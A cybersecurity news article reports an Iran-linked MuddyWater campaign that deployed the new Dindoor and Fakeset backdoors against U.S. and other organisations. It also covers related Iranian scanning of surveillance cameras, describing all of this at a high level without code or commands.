Iran-Linked MuddyWater Hackers Deploy New “Dindoor” Backdoor in Campaign Targeting U.S. Networks

Cybersecurity researchers have uncovered a new campaign attributed to the Iranian state-linked hacking group MuddyWater, which has embedded itself inside several U.S. organizations and deployed a previously unknown backdoor called Dindoor.

The activity, discovered by researchers from Broadcom’s Symantec and Carbon Black Threat Hunter teams, targeted multiple sectors including financial institutions, airport infrastructure, nonprofit organizations, and a software company connected to the defense and aerospace supply chain.

Targets Across Multiple Critical Sectors

Investigators found evidence that the threat actors had established footholds in networks belonging to a U.S. bank, a Canadian nonprofit, and a software company whose Israeli branch appears to have been the primary focus of the campaign.

The affected company supplies technology to defense and aerospace industries, making it a potentially valuable intelligence target. Researchers believe the attacks began in early February and continued amid rising geopolitical tensions following U.S. and Israeli military strikes involving Iran.

The Dindoor Backdoor

A key component of the operation is a newly discovered malware implant called Dindoor. The backdoor leverages the Deno JavaScript runtime, allowing attackers to execute commands and maintain persistent access inside compromised systems.

Using modern runtime environments such as Deno gives attackers a flexible platform to execute scripts and evade traditional security monitoring tools that may focus primarily on conventional malware families.

Researchers also observed attempts to exfiltrate data using the Rclone utility, which was configured to transfer files to a Wasabi cloud storage bucket. It remains unclear whether the data transfer succeeded.

Additional Malware: Fakeset Python Backdoor

In separate incidents involving a U.S. airport and a nonprofit organization, analysts identified another backdoor called Fakeset. This malware was written in Python and delivered from infrastructure hosted on Backblaze cloud storage servers.

The digital certificate used to sign Fakeset has previously been associated with other MuddyWater-linked malware families, including Stagecomp and Darkcomp, strengthening attribution to the same threat actor.

Advanced Social Engineering Tactics

Security researchers say MuddyWater has significantly improved its capabilities in recent years. Beyond technical malware development, the group has demonstrated strong proficiency in social engineering campaigns.

These include spear-phishing operations and so-called “honeytrap” tactics in which attackers build relationships with targets to gain access to accounts or sensitive information.

Parallel Activity Targeting Surveillance Cameras

Additional research indicates that other Iran-linked groups are simultaneously scanning for vulnerable surveillance systems, particularly Hikvision and Dahua IP cameras. Known vulnerabilities such as CVE-2017-7921 and CVE-2023-6895 are being actively exploited in these campaigns.

Exploitation attempts have surged across Israel and several Gulf countries including the United Arab Emirates, Qatar, Bahrain, and Kuwait. Security analysts believe compromised cameras could provide reconnaissance capabilities or enable battle damage assessment following missile strikes.

Cyber Activity Intensifies Amid Geopolitical Conflict

The discovery comes amid escalating tensions in the Middle East, where cyber operations have increasingly accompanied conventional military activity.

Hacktivist groups aligned with Iranian interests, including those linked to the Handala Hack collective, have also been observed routing attacks through Starlink IP infrastructure to probe external-facing applications for misconfigurations and weak credentials.

At the same time, security authorities are warning that cyber retaliation may expand beyond regional targets. The Canadian Centre for Cyber Security has issued an advisory cautioning that Iran could conduct retaliatory attacks against critical infrastructure and engage in broader information operations.

A Persistent Cyber Threat

The latest findings reinforce the view among cybersecurity experts that Iran’s cyber capabilities continue to evolve. By combining custom malware, cloud-based exfiltration tools, and targeted social engineering campaigns, groups like MuddyWater remain capable of infiltrating critical networks across multiple countries.

As geopolitical tensions deepen, security analysts expect both state-linked operators and aligned hacktivist groups to remain active in the digital domain, probing networks and seeking strategic advantages far beyond the physical battlefield.